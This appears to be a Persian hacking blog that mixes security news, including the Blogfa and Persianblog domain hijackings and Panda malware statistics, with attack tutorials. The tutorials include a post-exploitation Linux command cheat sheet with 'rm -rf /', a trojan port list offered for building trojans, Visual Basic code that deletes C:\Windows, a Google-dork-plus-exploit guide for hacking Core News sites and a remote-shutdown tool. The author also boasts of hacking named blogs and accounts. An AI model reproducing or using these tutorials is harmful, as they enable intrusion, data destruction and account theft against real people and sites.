هک شدن بیش از 100 سایت ایرانی به دلیل نشان دادن اعتراض تمام هکر های ایرانی...
هک شدن بیش از 100 سایت ایرانی به دلیل نشان دادن اعتراض تمام هکر های
ایرانی در مقابل فیلترینگ های متعدد سایت های هکینگ و امنیتی ایرانی .
همانطور که میدانید همه سایتهای هکینگ ایران دونه به دونه دارن فیلتر
میشن و هکر ها رو هم دزد خطاب کردند دلیل این امر هنوز مشخص نیست .
اما بعضی از هکرها نتونستن طاقت بیارن و حمله به سرورهای ایرانی را
شروع کردن و در اولین پروژه بیشتر از ۱۰۰ سایت ایرانی حمله کردن هیچ کس
این هکرها را نمیشناسه هر کی شناخت به منم بگه هه هه هه
این کتاب هم در مورد حمله از طریق پروتکل DNS توضیحاتی داده ، این یکی از
روش های دزدیدن دامنه می باشد ، هکران وقتی نتونن به سرور نفوذ کنند از
این حملات برای تغییر DNS ها به DNS های هاست خود و صفحه دیفیس شده
استفاده می کنند و معروفه به DNS Attack . امیدوارم استفاده لازم رو ببرید .
جواب یکی از دوستان که پرسیده بودند : "" SALAM MATLABE JALEBIE AGE TOZIH BEDID KE VAGHTY DOMAIN HACK MISHE DARVAGHE CHE ETEFAGHI MIOFTE MAMNUN MISHAM. MOVAFAGH BASHID ""
این روش که به نام DNS Attack شناخته میشه ، به DNS های دومین حمله میکنند و یک DNS دیگه از یه سایت دیگه بهش میدن که این باعث میشه که صاحب دامنه هیچ کاری نتونه بکنه و دامنه خودش رو از دست میده . درواقع مثل یک هاست بدون نام هست . اگه دقت کرده باشین ، یه زمانی دامنه blogfa.com را دزدیده بودند و به همین شکل عمل کرده بودند ، مدیر بلاگفا هم مجبور شد که دامنه blogfa.ir رو ثبت کنه و به کاربرانش بگه با این دامنه وارد بشن . اگه وقت کردم حتمآ یه مقاله در مورد DNS Attack واستون میذارم .
دستوراتی که میتوانیم بعد از شل گرفتن از سرور لینوکس اجرا نماییم
با سلام
خدمت تمام دوستان عزیز
دوستان این دستورات زمانی به دردتون میخوره که از یه سرور لینوکس شل گرفته باشید .
سعی می کنم چند تا شلر خوب هم واستون بذارم .
Linux CMD Line In Shell : ************************** ++++++++++++++++++++++++++ ************************** cat ./../mainfile.php - Config file. ls -la - Lists directory's. ifconfig {eth0 etc} - Ipconfig equiv. ps aux - Show running proccess's. gcc in_file -o out_file - Compile c file. cat /etc/passwd - List's accounts.
cat /home/user/public_html test /? >c:\test.txt (I use this if using a remote code execution exploit) has been tested loads of times works fine. sudo - Unsure.id - Tells you what user your logged in as. which wget curl w3m lynx - Check's to see what downloaders are present. uname -r - Shows all release info (or) cat /etc/release. uname -a - Shows all kernal info (or) cat /etc/issue last -30 - Last logged 30 ip's can change to desired number. useradd - Create new user account. usermod - Modify user account. w - See who is currently logged on. locate password.txt - Locates password.txt in current dur can use *. rm -rf / - Please be carefull with this command, i cannot stress this enough. arp -a - Whos on same subnet. lsattr -va - ls file attributes on linux second extended file system find / -type f -perm -04000 -ls - Finds suid files. find . -type f -perm -04000 -ls - Finds suid files in current dir. find / -type f -perm -02000 -ls - Finds all sgid files. find / -perm -2 -ls - Finds all writable files and folders. find . -perm -2 -ls - Finds all writable files and folders in current dir. find / -type f -name .bash_history - Finds bash history. netstat -an | grep -i listen - shows open ports. cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user with no pass. find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?. cat /proc/version /proc/cpuinfo - Cpu info. locate gcc- Finds gcc if installed. set - Display system variables. echo $path- Echo current path. lsmod- Dumps kernal modules. mount/df- Check mounted file system. rpm -qa- Check patch level for RedHat 7.0. dmesg- Check hardware ino. cat /etc/syslog.conf - Log file. uptime - Uptime check. cat /proc/meminfo - Memory check. find / -type f -perm -4 -print 2> /dev/null- Find readble files. find / -type f -perm -2 -print 2> /dev/null - Find writable files. chmod ### $folder - Chmod folder. ls -l -b - Verbosly list directory's
با سلام
دانستن این پورت ها برای ساخت
تروجان به شما کمک می کند. در زیر شماره پورت ها و تروجان هایی که از این
پورت ها به صورت پیش فرض استفاده میکنند آمده است.همچنین شما برای اینکه بفهمید کدام پورت ها روی سیستمتان باز استمی توانید ازدستورnetstat –na در داس استفاده کنید.
Port21------------back construction, blade runner, doly Trojan, fore, ftp Trojan, invisible
Ftp, larva, wincrash.
Port23---------------- tiny telnet service
Port 25 ---------------- ajan, antigen, email password sender
Port 31---------------- agent 31, hackers paradise
Port 41---------------- deep throat
Port 59--------------- dmsetup
Port 79--------------- firehotker
Port 80-------------- executor, ringzero
Port 110 ------------- promail Trojan
Port113 -------------- kazimas
Port 119 ------------- happy 99
Port 121------------- jammerkillah
Port 456 ------------- hackers paradise
Port 531 ------------ rasmin
Port 555 ------------- netadmin, phase zero
Port 666 ------------ attack ftp back construction, serverU
Port 911 ---------------- dark shadow
Port 999 --------------- deep throat, winsatan
Port 1001 ------------- silencer, webex
Port 1010 ------------- doly Trojan
Port 1011,1012,1015---------- doly Trojan
Port 1024 --------------- net spy
Port 1042 -------------- bla
Port 1045--------------- rasmin
Port 1090 ------------- xtreme
Port 1234 ------------ ultors Trojan
Port 1243 ------------- sub seven
Port 1999 ------------- backdoor
Port 1999,2000,2001,2002,2003,2004,2005,9878 -------- transScout
Port 2001 ------------ Trojan cow
Port 2140 ------------ deep throat
Port 2583,3024,4092 ------------ win crash
Port 2989 ------------ rat
Port 3791 ---------- eclipse
Port 4590 ------------ icqtrojan
Port 5400,5401,5402------------ blade runner, back construction
Port 6670,6771 -------------deep throat
Port 20000,20001 ------------- millennium
Port 20034 ------------- net bus
Port 30029 -------------- AOL Trojan
Port 54320,54321(udp) ------------ back orifice 2000
خوب اين ویروس کارش چيه؟ این ویروس باعث پاک شدن هر ادرسي ميشن که ما دوست داشته باشیم !! مثلا يکي از اين دايرکتوري ها ,دايرکتوري ويندوزه که باعث از بين رفتنش ميشه. خوب حالا بايد چکار بکنيم؟
توی ویژوال :
بايد اين کدها رو در General فرمتون قرار بديد :
Private Declare Function RemoveDirectory Lib "kernel32" Alias "RemoveDirectoryA" (ByVal lpPathName As String) As Long
حالا در from _load اين کد رو قرار بدين :
RemoveDirectory "C:\Windows"
ديديد پاک شد.حالا جالب تر هم ميشه.شما مي تونيد با قرار دادن دسته جمعي هر ثانيه يک فايل رو پاک کنيد. يک تايمر در برنامه تون قرار بديد و interval اون رو برابر 4000 قرار بديد حالا اين کدها رو وارد کنيد.
سلام دوستان هیچ وقت من چنین پستی رو نمیزدم توی وبلاگم ، اما این بار برای اطلاع خودش میزنم . به دلایل شخصی چند وبلاگ و آی دی رو هک کردم ، خودش هم دلیلش رو میدونه .
وبلاگ های هک شده : www.tokiohotelbill.blogfa.com www.bill11.blogfa.com
آیدی های هک شده : happookoomar_makhmal tokio.hotel_girl beachking_girl sandy_gina300
با سلام تو این آموزش میخوام نحوه هک کردن سایت هایی که از پورتال core news استفاده میکنن رو توضیح بدم . امیدوارم استفاده لازم رو ببرید .
1-ابتدا به گوگل برید و عبارت زیر رو بزنین:
inurl:Cornews2
یه سایتو انتخاب کنید
2-اکسپلویت زیر رو که ضمیمه کردم دانلود کنید و سپس در شاخه perl\bin مفسر پرلتون یا همون active perl کپی کنید توضیح اینکه اگه active perl ندارید میتونین از ادرس زیر دانلود کنید: http://www.ActiveState.com/ActivePerl
3-حالا به comand prompt برید و با شاخه perl\bin برید و اکسپلویت رو اجرا کنید (توضیح واسه دوستانی که چندان اشنایی ندارن اینکه تایپ در شاخه بالا که بودید تایپ کنید :perl coe.pl)
4-حالا اکسپلویت نحوه کارشو بهتون میگه که منم توضیح میدم در جلوی نام اکسپلویت نام یکی از سایتهایی رو که از گوگل پیدا کردیم رو مینویسیسم و بعدش یه فاصله میزنیو و فولدر corenew2 رو مشخص میکنیم مثلا اگر سایت ما : www.xxx.com/qq/cornews2 بود باید بزنید :
تهدیدهای جدیدی که هویت و اطلاعات کاربر را هدف قرار داده اند،رویکردهای جدید امنیتی را طلب می کند.
امروزه، حملات phishing ساده تر و کم خطرتر از تهدیدهای آنلاینی که در حال تجربه شدن هستند، به نظر می رسند. حملات phishing به آسانی شناخته می شوند و می توان به سرعت آنها را از کار انداخت. جرائم سازمان یافته از این حد گذشته و پیچیدگی آنها به طرز چشم گیری افزایش یافته است. امروزه، کاربران با اشکال موذیانه تری از حمله مواجه می شوند و کشف و مقابله علیه آنها بسیار مشکل تر است.
گونه ای جدید از حمله
این گونه جدید حمله بعنوان pharming شناخته می شود. pharming بجای اینکه کاربر را گول بزند تا به یک ایمیل تقلبی پاسخ دهد تا او را به یک وب سایت جعلی هدایت کند، برای فریب دادن کاربر برای تسلیم هویت و اطلاعات حساسش، از روش های زیرکانه تری استفاده می کند. این حملات از اسب های تروا (تروجان) برای نصب برنامه های کلیدخوان و برنامه های هدایت کننده استفاده می کنند تا به یک نفوذگر اجازه دهند کلمات عبور و شماره کارت های اعتباری را بدست آورد، بدون اینکه کاربر مجبور به انجام کاری غیرعادی باشد. در اینجا دو مثال از نحوه این حمله آورده شده است:
چه می توان کرد؟
از نظر تاریخی، رویکرد امنیتی که برای این نوع از حملات بکار گرفته شده است، مشابه مفهوم گارد مرزی (Boarder Guard) بوده است. ورود موارد زیان رسان را به کامپیوتر متوقف کنید و جلوی کاربر را از رفتن به مکان های بد بگیرید. ابزارهایی مانند آنتی ویروس، ضدجاسوس، فایروال ها و تشخیص دهندگان نفوذ، همگی چنین رویکردی دارند. به هرحال، همچنانکه حملات به رشد خود ادامه می دهند و پیچیده تر می شوند، نمی توان از احتمال نصب شدن موفقیت آمیز یک کلیدخوان یا هدایت کننده علیرغم این گاردهای مرزی، غافل ماند.
برای سروکار داشتن با این احتمال، رویکرد متفاوت دیگری مورد نیاز است. علاوه بر ابزارهایی که ذکر آنها رفت، نیاز است که هویت و اطلاعات کاربران توسط محافظ شخصی (body guard) مراقبت شود. یعنی، نیاز است که هویت و اطلاعات شخص بدون در نظر گرفتن نوع حمله و جایی که اطلاعات کاربر به آنجا می رود، همواره امن باقی بماند. این نوع امنیت قابلیت های محافظ شخصی را برای هویت کاربر ایجاد می کند و اهمیتی ندارد که اطلاعات کاربر به کجا فرستاده می شود و کلیدخوان نصب شده است و یا اینکه نفوذگر می تواند ترافیک اینترنت را نظارت کند.
دو قابلیت امنیتی وجود دارد که می تواند توانایی این محافظ شخصی را پیاده کند. اولی تصدیق هویت قوی (strong authentication) است. امروزه، کاربران عموماً برای محافظت از هویتشان به یک کلمه عبور اطمینان می کنند، اما احتمال زیادی وجود دارد که کلمه عبور توسط کسی که نظاره گر login است، دزدیده شود. داشتن یک عامل اضافی برای تصدیق هویت، یعنی چیزی که کاربر باید بصورت فیزیکی داشته باشد علاوه بر آنچه که می داند، می تواند یک هویت آنلاین را در برابر حمله محافظت کند. این کار قابل مقایسه با چگونگی تأیید هویت کاربران در ماشین های خودپرداز بانک است. کاربران هم کارت بانکی دارند و هم PIN را می دانند. با تصدیق هویت قوی، اگر کلیدخوان هم نصب شده باشد، می تواند تنها کلمه عبور را بگیرد و نه عامل فیزیکی استفاده شده در پروسه تصدیق هویت را. کلمه عبور به تنهایی و بدون فاکتور فیزیکی نمی تواند توسط نفوذگر برای دسترسی به حساب کاربر مورد استفاده قرار گیرد.
توانایی مهم دوم رمزنگاری مداوم است. امروزه، SSL (Secure Socket Layer) از اطلاعات ارسال شده توسط کاربران بگونه ای محافظت می کند که انگار تنها به سرور هدف ارسال می شوند. برای مثال، اگر یک کاربر کلمه عبور خود را وارد کند، به راحتی تا زمان رسیدن به و ب سرور در طرف دیگر، قابل مشاهده است. در مورد یک حمله هدایت کننده، ارتباط امن در سایت نفوذگر پایان می پذیرد و قبل از اینکه به سازمان آنلاین قانونی ارسال شود، دیتای کاربر در معرض افشاء قرار می گیرد. رمزنگاری مستمر می تواند از دیتا ،بدون در نظر گرفتن امنیت ارتباط، محافظت کند. ورودی های کاربر قبل از ترک کامپیوتر کاربر رمز می شوند و می توانند تنها توسط سازمان قانونی که به سرورهای طرف دیگر دسترسی دارد، رمزگشایی شوند. حتی اگر دیتا به این سرور نرسد، رمزشده باقی خواهد ماند و برای یک نفوذگر قابل استفاده نیست.
این دو قابلیت به همراه هم، می توانند نقش محافظ شخصی را برای محافظت از هویت و اطلاعات کاربر در دنیای خصمانه! اینترنت ایفاء کنند.
بررسی دنیای واقعی
چند انتخاب وجود دارند که می توانند امنیت محافظ شخصی را فراهم کنند اما باید با استفاده از نیازهای دنیای واقعی اینترنت ارزیابی شوند. چنانچه کاربر با یک تکنولوژی احساس راحتی نکند، آن را نخواهد پذیرفت. اگر تکنولوژی خیلی گران باشد، نه برای کاربر انتهایی قابل تهیه خواهد بود و نه برای سازمان مربوطه.
چندین عامل وجود دارد که باید به هنگام تشویق کاربران به پذیرش تکنولوژی مورد نظر مورد توجه قرار گیرند:
· نرم افزار کلاینت ـ هر نیازی به دانلود و نصب نرم افزار به عنوان یک مانع است...
· واسط نرم افزار ـ خطرات و پیچیدگی که کاربر برای پیاده سازی تجربه می کند...
· راحتی استفاده ـ مخصوصاً برای تصدیق هویت دو عامله! ، راحتی استفاده شامل قابلیت حمل، دوام است. سهولت کار با واسط کاربر نیز مورد توجه جدی است.
مشخصاً زمانی که از این نوع فناوری با مقیاس بالا بکارگرفته شود، هزینه این رویکرد می تواند در امکانپذیری آن موثر باشد. اگر هزینه کل سیستم خیلی بالا باشد، سازمان ها برای برقراری این امنیت اضافی برای یک مورد تجاری مورد قبول، نیاز به مطالبات مالی از کاربران دارند. در این موارد کاربران به راحتی راضی به پرداخت های اضافی برای برقراری این امنیت بیشتر نمی شوند.
به این منظور تکنولوژی های محافظ شخصی باید سطح بالایی از امنیت را در حالی که هزینه کمی در بردارند و برای استفاده آسان هستند، فراهم کنند. ------------------------- از: ircert ۱- کاربر یک ایمیل ظاهراً صحیح را باز می کند که او را تشویق می کند تا فایل الحاقی به ایمیل را باز کند. این فایل الحاقی بصورت مخفیانه یک «کلیدخوان» (برنامه ای است که کلیدهایی را که توسط کاربر زده می شود، ثبت می کند) نصب می کند. هنگامی که کاربر به بانک آنلاین خود سر می زند، کلیدخوان این را تشخیص می دهد و ورودی های صفحه کلید کاربر را هنگامی که وی اسم و کلمه عبور را تایپ می کند، ثبت می کند. سپس این اطلاعات برای نفوذگر ارسال می شود تا برای دسترسی به حساب کاربر استفاده شود. ۲- یک کاربر ممکن است با دانلود کردن یک فایل یا مشاهده یک وب سایت که حاوی ActiveX control است، سهواً یک «هدایت کننده» (redirector) را روی سیستم خود نصب کند. این کار باعث می شود که فایل های موجود در سیستم دچار تغییراتی شود و هنگامی که کاربر به بانک آنلاین خود سر می زند، به وب سایت نفوذگر هدایت شود. این عمل می تواند با مسموم کردن سرور DNS انجام گیرد که برای آدرس بانک آنلاین کاربر، IP وب سایت نفوذگر را می فرستد. حملات پیچیده تر می توانند ارتباط را با بانک کاربر برقرار کنند و هنگامی که پروسه در حال انجام است، ترافیک عبوری بین کاربر و بانک (شامل کلمات عبور و اطلاعات شخصی) را مشاهده کنند. در اصل نفوذگر خود را بین کاربران و بانک قرار می دهد.
با سلام خدمت تمام دوستان عزیز ، شرمنده دوستان یه مدته سرم خیلی شلوغه نمیتونم آپ کنم .
امروز میخوام نحوه تشخیص دادن نوع سرور ( Unix , Win , Linux, ... ) رو از طریق پینگ کردن به شما آموزش بدم . امیدوارم استفاده لازم رو ببرید . برای شروع اول یک سایت رو در نظر میگیرم ، مثلآ سایت yahoo.com . اول به اینجا برید : Start >RUN >CMD بعد بنویسید ، Ping name site که به جای name site نام سایت مورد نظر را مینویسید . به مثال زیر توجه کنید : ping yahoo.com
حالا توی قسمتی که نوشته TTL ما شماره مورد نظر رو از لیست پایین میبینیم و مشخص میشه که سرور چیست . الان سرور یاهو قسمت TTL به ما 53 رو داده ، توی لیست پایین 53 Linuxe هست . البته بعضی وقت ها به دلیل این که از سرور های دیگری هم میگذره این شماره تغییر میکنه . راه هایی هم وجود دارند که TTL رو تغییر داد تا غیر قابل شناسایی بشن .
لیست : OS Version Protocol TTL Notes
OS Version Protocol TTL Notes
AIX TCP 60
AIX UDP 30 2
AIX 3.2, 4.1 ICMP 255 3
BSDI BSD/OS 3.1 and 4.0 ICMP 255 3
Compa Tru64 v5.0 ICMP 64 3
DEC Pathworks V5 TCP and UDP 30 2
FreeBSD 2.1R TCP and UDP 64 2
FreeBSD 3.4, 4.0 ICMP 255 3
FreeBSD 5.0 ICMP 64 2
HP-UX 9.0x TCP and UDP 30 2
HP-UX 10.01 TCP and UDP 64 2
HP-UX 10.20 ICMP 255 3
HP-UX 11.00 ICMP 255 3
HP-UX 11.00 TCP 64
Irix 5.3 TCP and UDP 60 2
Irix 6.x TCP and UDP 60 2
Irix 6.5.3, 6.5.8 ICMP 255 2
MPE/IX (HP) ICMP 200
Linux 2.0.x kernel ICMP 64 3
Linux 2.2.14 kernel ICMP 255 3
Linux 2.4 kernel ICMP 255 3
Linux Red Hat 9 ICMP and TCP 64
MacOS/MacTCP 2.0.x TCP and UDP 60 2
NetBSD ICMP 255 3
OpenBSD 2.6 & 2.7 ICMP 255 3
OpenVMS 7.1-2 ICMP 255 3
OS/2 TCP/IP 3.0 64 4
OSF/1 V3.2A TCP 60 2
OSF/1 V3.2A UDP 30 2
Solaris 2.5.1, 2.6, 2.7, 2.8 ICMP 255 3
Solaris 2.8 TCP 64
Stratus TCP_OS ICMP 255
Stratus TCP_OS (14.2-) TCP and UDP 30 1
Stratus TCP_OS (14.3+) TCP and UDP 64 1
Stratus STCP ICMP/TCP/UDP 60
SunOS 4.1.3/4.1.4 TCP and UDP 60 2
SunOS 5.7 ICMP and TCP 255
Ultrix V4.1/V4.2A TCP 60 2
Ultrix V4.1/V4.2A UDP 30 2
Ultrix V4.2 - 4.5 ICMP 255 3
VMS/Multinet TCP and UDP 64 2
VMS/TCPware TCP 60 2
VMS/TCPware UDP 64 2
VMS/Wollongong 1.1.1.1 TCP 128 2
VMS/Wollongong 1.1.1.1 UDP 30 2
VMS/UCX TCP and UDP 128 2
Windows for Workgroups TCP and UDP 32 2
Windows 95 TCP and UDP 32 2
Windows 98 ICMP 32
Windows 98, 98 SE ICMP 128 3
Windows 98 TCP 128
Windows NT 3.51 TCP and UDP 32 2
Windows NT 4.0 TCP and UDP 128 2
Windows NT 4.0 SP5- 32 4
Windows NT 4.0 SP6+ 128 4
Windows NT 4 WRKS SP 3, SP 6a ICMP 128 3
Windows NT 4 Server SP4 ICMP 128 3
Windows ME ICMP 128 3
Windows 2000 pro ICMP/TCP/UDP 128
Windows 2000 family ICMP 128 3
Windows Server 2003 128 4
Windows XP ICMP/TCP/UDP 128
OS VERSION PLATFORM TTL WINDOW DF TOS
------ --------- -------- --- --- ------- -- ---
DC-OSx 1.1-95 Pyramid/NILE 30 8192 n 0
Windows 9x/NT Intel 32 5000-9000 y 0
NetApp OnTap 5.1.2-5.2.2 54 8760 y 0
HPJetDirect HP_Printer 59 2100-2150 n 0
AIX 4.3.x IBM/RS 60 006016000-16100 y 0
AIX 4.2.x IBM/RS 60 006016000-16100 n 0
Cisco 11.2 7507 60 65535 y 0
DigitalUnix 4.0 Alpha 60 33580 y 16
IRI X6.x SGI 60 61320 y 16
OS390 2.6 IBM/S390 60 32756 n 0
Reliant 5.43 Pyramid/RM1000 60 65534 n 0
FreeBSD 3.x Intel 64 17520 y 16
JetDirect G.07.x J3113A 64 5804-5840 n 0
Linux 2.2.x Intel 64 32120 y 0
OpenBSD 2.x Intel 64 17520 n 16
OS/400 R4.4 AS/400 64 8192 y 0
SCO R5 Compaq 64 24820 n 0
Solaris 8 Intel/Sparc 64 24820 y 0
FTX(UNIX) 3.3 STRATUS 64 32768 n 0
Unisys x Mainframe 64 32768 n 0
Netware 4.11 Intel 128 32000-32768 y 0
Windows 9x/NT Intel 128 5000-9000 y 0
Windows 2000 Intel 128 17000-18000 y 0
Cisco 12.0 2514 255 3800-5000 n 192
Solaris 2.x Intel/Sparc 255 8760 y 0
انتشار بيشتر و سريعتر ويروس هاي رايانه اي با مشاركت كاربران اينترنت!
به گزارش آژانس خبری پرشین هک،دريافت پول توسط كاربران عادي و حتي حرفه اي اينترنت، در ازاي قرار دادن بنرها و پيوندهاي تبليغاتي در سايت، بلاگ و يا صفحات شخصي در وب، براي افزايش تعداد بازديد مراكز تجاري، به روشي آسان و پنهان در انتشار هرچه بيشتر ويروس هاي رايانه اي تبديل شده است.
به گزارش Panda Security، بسياري از كاربران اينترنت كه به شكل آنلاين، كدهاي مربوط به تصاوير، فيلم ها و بنرهاي تبليغاتي را در صفخات شخصي خود قرار داده و پول آن را نيز دريافت مي كنند، در حقيقت به شكل كاملاً ناخواسته، در گسترش سريعتر كدهاي مخرب سهيم شده اند.
بر اساس اين گزارش، بسياري از مراكزي كه در قالب شركت ها، سازمان ها و بنگاه هاي قانوني، كاربران اينترنت را در ازاي دريافت پول، به قرار دادن آگهي هاي تجاري و لينك هاي تبليغاتي خود تشويق مي كنند، در حقيقت گروه هاي خرابكاري هستند كه قصد دارند تعداد بيشتري از كاربران را به صفحات مخرب در وب هدايت كرده و با سرقت اطلاعات حساس و محرمانه آنها، سودهاي كلان بدست آورند.
با توجه به روند رو به تزايد تبليغات آنلاين، پاندا به كليه كاربران اينترنت توصيه كرده است كه از قرار دادن هرگونه لينك، بنر و يا iFrame مشكوك بر روي وبلاگ و يا صفحات شخصي خود در وب، خودداري كرده و از مشاركت ناخواسته در جرائم و فعاليت هاي غير قانوني تبه كاران اينترنتي جلوگيري كنند.
Panda Software، با انتشار گزارش جديد خود در خصوص وضعيت امنيت فن آوري اطلاعات در اغلب كشورهاي جهان، فهرست ويروس ها، كدها و حملات رايانه اي مهم و شايع كشور را در ماه ژوئن اعلام كرد.
به گزارش آژانس خبری پرشین هک از ایستنا،بر اساس اين فهرست كه شامل بدافزارهاي بسيار مهم و شايعي چون Jeefo.A و Downloader.Mdw مي باشد، ويروس مشهور W32/Maximus.A، پس از گذشت سه ماه متوالي، همچنان در رتبه نخست شايعترين و مهمترين كدهاي مخرب فعال در ايران، قرار دارد.
بنا بر اعلام پاندا، اين ويروس خطرناك كه عامل بيش از ده درصد كل آلودگي هاي رايانه اي در كشور بوده است، با استفاده از مهمترين روش انتشار خود، يعني حفره هاي امنيتي موجود در برنامه هاي كاربردي و سيستم هاي عامل، در هنگام باز كردن فايل ها و نامه هاي الكترونيك آلوده ، سيستم ها و شبكه هاي رايانه اي را مورد حمله قرار مي دهد.
حافظه هاي جانبي قابل اتصال به سيستم، مشاهده صفحات وب نا امن و داونلود فايل هاي آلوده، كانال هاي FTP و IRC و نيز شبكه هاي P2P، از ديگر راه هاي انتشار و افزايش حملات اين ويروس خطرناك، محسوب مي شوند.
از مهمترين عملكردهاي تخريبي اين كد، ايجاد تغيير در ساختار فايل هاي مختلف و بويژه فايل هاي HTML براي آلوده كردن سيستم ها و شبكه هاي رايانه اي ست.
مطابق با اعلام پاندا، علاوه بر به روز رساني نرم افزار امنيتي، مهمترين روش پيشگيري از نفوذ Maximus.A، ترميم حفره ها و نقص هاي امنيتي موجود در سيستم عامل، مرورگرهاي وب و ساير برنامه ها و نرم افزارهاي كاربردي نصب شده در سيستم مي باشد كه با توجه به استفاده اغلب كاربران ايراني از نسخه هاي كرك شده، غير رسمي و ثبت نشده و در نتيجه وجود نقاط آسيب پذير فراوان در سيستم ها و هم چنين عدم بروز رساني صحيح و مستمر برنامه هاي امنيتي، كاهش انتشار و شيوع اين ويروس مخرب در كشور، مورد انتظار نخواهد بود.
فهرست مهمترين و شايع ترين كدهاي مخرب ماه ژوئن در جمهوري اسلامي ايران:
1. W32/Maximus.A با شيوع 10.08 درصد 2. W32/Brontok.H.worm با شيوع 8.40 درصد 3. W32/Tearec.A.worm با شيوع 7.56 درصد 4. Trj/QHost.FP با شيوع 5.88 درصد 5. W32/FolderToEXE.A.worm با شيوع 5.04 درصد 6. Trj/Downloader.MDW با شيوع 4.20 درصد 7. W32/Jeefo.A با شيوع 4.20 درصد 8. W32/Maximus.A.drp با شيوع 4.20 درصد 9. W32/Wukill.A.worm با شيوع 4.20 درصد 10. W95/Marburg با شيوع 4.20 درصد
پس از دزدیده شدن دامنه پرشین بلاگ و حملات اخیر به بلاگفا اینبار نوبت به ایران بلاگ رسید. این سرویس دهنده که به تازگی فعالیت خود را شروع کرده است طی حملاتی توسط هکرانی که Michel Groups نام دارند دیفیس شد.
روش استفاده : برنامه رو از حالت زیپ در بیارید ( شما به برنامه winzip نیاز دارید ) بعد برنامه رو اجرا کنید ، گوشه پایین سمت چپ Menu رو انتخاب کنید ، بعد Parameter رو انتخاب کنید ، توی قسمت Start ip آی پی مورد نظر و توی End ip هم آی پی که میخواید تا اون آی پی اسکن بشه رو بنویسید ، بعد Ok بزنید و از Menu گزینه Start رو بزنید تا شروع به اسکن کنه . توی قسمت بالا سمت راست هم پورت های باز رو نشون میده . موفق باشید .
تقريبا تا حدودي به اين نتيجه رسيدهام كه هك سايت پرشينبلاگ كار يك ايراني است!! حالا چرا طرف برداشته گفته من عراقيام نميدانم، يك نمونه كوچك آن اول اينكه به فارسي روي سايت نوشتهاند كه { برشین بلاگ در حال بروز رسانی میباشد لطفا چند روز بعد مراجعه فرماید.} دوم اينكه اگر سورس صفحه را باز كنيد ميبينيد كه طرف سيستمش كاملا فارسي بوده و همچنين از فرونتپيج يا هر نرمافزار ديگري كه فارسي را ساپورت ميكرده اين صفحه را درست كرده، از همه بدتر خيلي شرمندهام كه اين حرف را ميزنم؛ آنقدر خر بوده طرف كه اگر خط ۴ سورس را ببینید که نوشته :
این کاملا با کلمه برشین (و نه پرشین «پ نه ب») در تناقض کامل است! (يكم فكر كنيد) <meta http-equiv="Content-Language" content="fa">
+ برای رد گم کنی بوده یا هر چیز دیگری نمیدانم. + اميدوارم من اشتباه كرده باشم و هرچه زودتر پرشينبلاگ به حالت اولش برگردد. + حجم نسبتا زيادي (حالا همچين زياد هم نه ولي خٌب چون آرشيو ۵ ساله داشته ميشود گفت زياد) از جستجوها در موتورهاي جستجو به پرشينبلاگ دات كام تعلق دارد، واقعا حيف است به همين راحتي از دست بروند ...
سلام دوستان عزیز . توجه کردین وقتی وارد سایت Blogfa.com میشیم آدرس به Blogfa.ir تغییر میکنه !!
حالا خبر رو بخونید میفهمید چی شده :
بلاگفا، سرویس ارائه دهنده خدمات وبلاگ رایگان که اکنون میزبان بیش از یک میلیون وبلاگ فارسی است در اطلاعیه ای که اواخر روز پنجشنبه منتشر کرد اعلام داشت حملات گسترده ای به دامنه ی اصلی این سایت صورت گرفته است.
در متن این اطلاعیه که توسط "علیرضا شیرازی" مدیر این سایت نوشته شده است آمده است: "در طول دو هفته گذشته حملات متعددی به سایت بلاگفا و بخصوص دامنه بلاگفا دات کام صورت گرفته و با توجه به تکرار تهدیدها و گسترش حملات به سایت، تیم مدیریت بلاگفا تصمیم گرفته است که در جهت جلوگیری یا کاهش اختلال احتمالی و همچنین دسترسی دائم کاربران سایت به وبلاگها و بخش مدیریت وبلاگ دامنه بلاگفا دات آی آر را بصورت دامنه اصلی سایت مورد استفاده قرار دهد.
بنابراین همانطور که قبلاً نیز به آن اشاره شده است سایت بلاگفا و همچنین وبلاگهای زیر مجموعه آن از طریق دامنه بلاگفا دات آی آر در دسترس خواهند بود.
در این مدت بصورت شبانه روزی و با کمک چند تن از متخصصین و کارشناسان امنیت شبکه در تلاش بودیم که بدور از هیاهو مشکلات را برطرف کنیم و در این میان شواهد و مدارک متعددی از نوع حملات و عاملین آن جمع آوری شده است. ضمن محکوم نمودن اینگونه حملات که نتیجه ای جز نا امنی و خسارت برای وب فارسی ندارد امیدواریم مشکل جدی برای دامنه BLOGFA.COM ایجاد نشود ولی شرط احتیاط را مد نظر داریم و تلاش می کنیم که کاربران سایت را از تهدیدها و حملات اخیر مصون داریم."
لازم به یادآوری است طی هفته های گذشته در اقدامی مشابه سایت پرشین بلاگ که اصلی ترین رقیب بلاگفا محسوب می شود بدلیل حمله ی یک گروه هک ناشناس که خود را عراقی معرفی کرده بودند،
دامین اصلی خود یعنی persianblog.com را از دست دادند !
هرچند که مسئولان بلاگفا تاکنون اطلاعات بیشتری را پیرامون نوع این حملات و یا ماهیت افراد مخرب اعلام نکرده اند اما برخی شواهد حکایت از آن دارد که گروه حمله کننده به سایت پرشین بلاگ، نه یک گروه عراقی بلکه یک گروه ایرانی بوده است!!!!!
سلام دوستان . خوبید ؟ امروز به سفارش یکی از دوستان کتاب الکترونیکی آموزش HTML رو واستون گذاشتم که به زبان فارسیه . برای نوشتن قالب وبلاگ باید HTML رو یاد بگیرید اما به این آسونی ها هم نیست . امیدوارم استفاده لازم رو ببرید . موفق باشید .
سلام دوستان . از امروز توی وبلاگ بخش دانلود برنامه ها و کتاب های مفید راه اندازی شد . دوستانی که برنامه یا کتابی در نظر دارن توی قسمت نظرات بیان کنن تا واسشون بزارم . موفق باشید .
سلام دوستان . خوبید ؟ خوش میگذره ؟ امروز گفتم یه برنامه جالب واستون بزارم واسه دفاع از خودتون !
این یه برنامه است که وقتی یه آی پی یا اسم کامپیوتر رو بهش بدی اون سیستم رو واستون ریستارت یا خاموش میکنه .
حالا آموزش . اول فایل رو از حالت زیپ در میارید ( شما نیاز به برنامه winzip دارید ) بعد آی پی طرف که میخواید کامپیوترش خاموش یا ریستارت کنه رو توی قسمت خالی مینویسید و یکی از گزینه های Restart یا Shutdown رو بزنید . یه صفحه داس باز میشه صبر کنید تا اون صفحه خود به خود بسته بشه بعد کامپیوتر طرف هم خاموش میشه ! یه بار میتونید رو کامپیوتر خودتون اجراش کنید آی پی خودتونو بدین . خیلی جالبه ! به همین سادگی... به همین خوشمزگی...
